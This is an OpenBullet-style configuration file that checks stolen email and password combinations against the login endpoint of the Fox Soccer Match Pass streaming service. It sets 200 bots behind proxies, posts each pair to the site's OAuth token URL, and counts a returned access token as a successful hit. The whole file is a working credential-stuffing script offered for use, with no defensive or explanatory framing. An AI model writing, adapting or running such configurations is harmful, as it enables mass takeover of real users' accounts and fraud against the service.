[SETTINGS]
{
  "Name": "foxsoccermatchpass",
  "SuggestedBots": 200,
  "LastModified": "2018-05-30T02:01:34.472057+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#ID PARSE "<SOURCE>" LR "{\"id\":\"" "\",\"code" Recursive=FALSE -> VAR "ID" "" "" 
#REQUEST_LOGIN REQUEST POST "https://www.foxsoccermatchpass.com/api/user/oauth/token" AutoRedirect=TRUE 
  CONTENT "username=<USER>&password=<PASS>&grant_type=password&client_id=42cc360e-6fbb-4472-9437-2f088b8730de" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://www.foxsoccermatchpass.com/en" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "<RESPONSECODE>" Contains "400" 
  KEYCHAIN Success OR 
    KEY "access_token" 
